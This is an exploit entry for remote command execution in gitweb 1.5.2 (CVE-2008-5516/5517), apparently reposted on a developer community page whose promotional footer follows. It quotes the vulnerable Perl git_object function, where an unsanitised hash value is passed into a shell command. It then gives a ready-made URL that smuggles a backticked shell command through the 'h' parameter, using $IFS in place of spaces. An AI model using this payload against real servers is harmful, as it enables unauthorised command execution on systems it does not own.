gitWeb v1.5.2 Remote Command Execution
# Exploit Title: gitWeb remote command execution# Date: 2009.06.19# Author: S2 Crew [Hungary]# Software Link: -# Version: GIT 1.5.2# Tested on: debian li...
·
# Exploit Title: gitWeb remote command execution |
# Date: 2009.06.19 |
# Author: S2 Crew [Hungary] |
# Software Link: - |
# Version: GIT 1.5.2 |
# Tested on: debian linux, GIT 1.5.2 |
# CVE: CVE-2008-5516 - CVE-2008-5517 |
|
# Code: |
|
# The cgi script doesn't show the command output *blind command execution ;)* |
# Vulnerable functions in gitweb.cgi: git_snapshot(), git_search(), git_object() |
|
|
sub git_object { |
# object is defined by: |
# - hash or hash_base alone |
# - hash_base and file_name |
my $type; |
|
# - hash or hash_base alone |
if ($hash || ($hash_base && !defined $file_name)) { |
my $object_id = $hash || $hash_base; |
|
my $git_command = git_cmd_str(); |
open my $fd, "-|", "$git_command cat-file -t $object_id 2>/dev/null" |
or die_error('404 Not Found', "Object does not exist"); |
$type = <$fd>; |
chomp $type; |
close $fd |
or die_error('404 Not Found', "Object does not exist"); |
|
# - hash_base and file_name |
|
# Example |
http://server/cgi-bin/gitweb.cgi?p=sample.git/.git;a=object;f=program.c;h=e69de29bb2d1d6434b8b29ae775ad8c2e48c5391|`touch$IFS/tmp/file.txt`|;hb=9adaf5b35bb6415497d23f089660567227ea3785 |
开放原子开发者工作坊旨在鼓励更多人参与开源活动,与志同道合的开发者们相互交流开发经验、分享开发心得、获取前沿技术趋势。工作坊有多种形式的开发者活动,如meetup、训练营等,主打技术交流,干货满满,真诚地邀请各位开发者共同参与!
更多推荐
0
0- 0
已为社区贡献3条内容
所有评论(0)